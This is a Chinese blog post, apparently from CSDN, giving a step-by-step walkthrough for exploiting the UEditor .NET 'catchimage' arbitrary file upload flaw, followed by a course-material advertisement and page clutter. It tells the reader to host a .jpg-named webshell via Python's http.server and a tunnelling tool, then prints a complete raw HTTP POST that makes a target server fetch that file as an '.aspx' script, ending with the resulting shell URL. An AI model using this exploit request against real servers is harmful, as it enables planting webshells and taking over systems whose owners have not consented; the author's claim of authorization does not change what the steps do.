Ueditor文件上传漏洞&&简易外网可访问服务器搭建(1)

于 2024-05-13 04:03:49 发布
阅读量792 收藏 30
点赞数 23
分类专栏: 程序员 文章标签: 服务器 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84972858/article/details/138778479
版权

这里就不教如何搭环境了,别的博主写的很详细了,而且我验证的实战环境,也不用搭,别学我,我有授权的,未经允许进行渗透测试是违法的哦。

扯远了,说回这个漏洞,原理是通过文件写入的方式把木马写入服务器,又因为Ueditor校验只校验了后缀,所以其实不用做图片马,后缀改成jpg就行。

这个漏洞最简单的验证方法就是直接通过burp发包,也不用搞什么html,先说服务器的问题。

1.做一个木马文件出来,后缀是.jpg,样子如图

2.然后在木马所在的文件夹打开cmd,可以直接在文件夹上面的地址栏里面直接输入cmd然后回车就行,因为Python的简易服务器就是以你执行命令所在的文件夹为根目录的,所以必须在这个文件夹。

3.运行命令,9090是端口,记的不要用8080,不然burp内置浏览器会出问题的。

Python -m http.server 9090

4.然后可以在浏览器验证一下,出现跟下图一样就成功了。链接:http://127.0.0.1:9090/

5.然后下载一个cpolar,安装直接一直下一步就行,这里就不贴图了,要注册账号,后面要用的。官网链接:cpolar官网-安全的内网穿透工具 | 无需公网ip | 远程访问 | 搭建网站

6.安装完成后访问http://127.0.0.1:9200/,用上一步注册的账号登录即可,登录之后直接在隧道管理里面创建隧道即可,端口要和你启动Python服务器的端口一致,其他都默认就行。

7.完成后在状态-在线隧道列表里面就能看到了,随便访问一个公网地址就行了

8.验证截图

9.到这工作已经完成大半了,之前说过验证这个漏洞最简单的方法就是发包,数据包我直接借用如下链接的大佬文章里面的。链接:UEditor 任意文件上传漏洞

POST /Utility/UEditor/index?action=catchimage HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="100", "Chromium";v="100", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

source[]=http://替换为自己服务器开启http服务的URL地址/666.jpg?.aspx

10.然后就是紧张刺激的发包传马了,哦,对,还没说怎么初步检验是否存在漏洞,拼接url:http://ip:port/UEditor/net/controller.ashx?action=catchimage。出现下图,证明可能存在漏洞。

11.把source[]=后面的链接换成上面搭好的服务器的公网访问地址,然后后面加上?.aspx,然后如图的返回包就是上传成功了,框起来的部分就是地址,拼接之后大概是这样的链接:http://ip:port/Utility/UEditor/upload/image/22222222/22222222222222222222.aspx

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84972858
关注
  • 23
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用ueditor文件功能上文件服务器的地址&&&&&字符统计功能重写
01-03
这几天用到了UEDITOR文件功能,但是UEDITOR自带的文件功能只能将文件到项目根目录.百度搜索也没有很多相关的资料,更关键的是没有相关的源代码. 所以今天把我自己实现的这部分代码上,希望大家共同进步...
ueditor源码扩展,文件服务器地址
04-13
ueditor源码扩展,支持设置文件服务器地址
UEditor 任意文件漏洞
热门推荐
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上路径与页面比例大小,一些视频文件的上,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
Ueditor编辑器任意文件漏洞
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件漏洞(部署环境到漏洞复现)
Ueditor文件漏洞&&简易访问服务器搭建
m0_56750162的博客
03-22 733
2.然后在木马所在的文件夹打开cmd,可以直接在文件夹上面的地址栏里面直接输入cmd然后回车就行,因为Python的简易服务器就是以你执行命令所在的文件夹为根目录的,所以必须在这个文件夹。扯远了,说回这个漏洞,原理是通过文件写入的方式把木马写入服务器,又因为Ueditor校验只校验了后缀,所以其实不用做图片马,后缀改成jpg就行。这里就不教如何搭环境了,别的博主写的很详细了,而且我验证的实战环境,也不用搭,别学我,我有授权的,未经允许进行渗透测试是违法的哦。万幸是找到了,不然也不会有这篇文章了。
UEditor v1.4.3.3 .net版本任意文件 漏洞复现
Boom!脑洞大爆炸的博客
07-07 5690
UEditor v1.4.3.3 .net版本任意文件 漏洞复现
ueditor漏洞修复
02-11
 Ueditor编辑器上漏洞导致getshell  漏洞存在版本:1.4.3.3 Net版(目前最新版本,已停更) 二、修复文件 ueditor\net\App_Code\CrawlerHandler.cs 下载本附件,按上述路径覆盖文件即可。实测可用。
百度控件ueditor图片上到远程服务器解决方案
03-08
百度控件ueditor图片上到远程服务器解决方案 一、搭建ueditor环境 二、修改源码 三、重新编译源码 四、使用说明
UEditor编辑器自定义上图片或文件路径的修改方法
10-25
主要介绍了UEditor编辑器自定上图片或文件路径的方法,需要的朋友可以参考下
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 4951
ueditor漏洞主要存在于其上功能中,攻击者可以利用上漏洞将恶意脚本上服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上文件的后缀名是否在指定的白名单之内。
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6150
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
【技术分享】ueditor漏洞利用&源码分析超详细分析
A1_3_9_7的博客
03-15 985
ueditor漏洞主要存在于其上功能中,攻击者可以利用上漏洞将恶意脚本上服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上文件的后缀名是否在指定的白名单之内。
UEditor编辑器两个版本任意文件漏洞分析
ahhacker86的专栏
01-25 1742
UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点 ,被广大WEB应用程序所使用;本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 236
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个站,输入自己的邮箱获取激活码。
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
zz12345600354的博客
04-26 587
ueditor漏洞主要存在于其上功能中,攻击者可以利用上漏洞将恶意脚本上服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上文件的后缀名是否在指定的白名单之内。
Ueditor 使用
zone
04-18 1651
MVC使用Ueditor首先进行配置, 前台配置 ue = UE.getEditor('container', {             toolbars: [                 [                     'source',                     'bold',                     'italic',    
ueditor文件漏洞
08-31
1. 文件类型验证: 在服务器端进行文件类型的验证,限制上文件的后缀名和MIME类型,禁止上可执行文件等危险类型的文件。 2. 文件名处理: 对上文件进行重命名,采用随机的文件名或者加密的文件名,避免使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值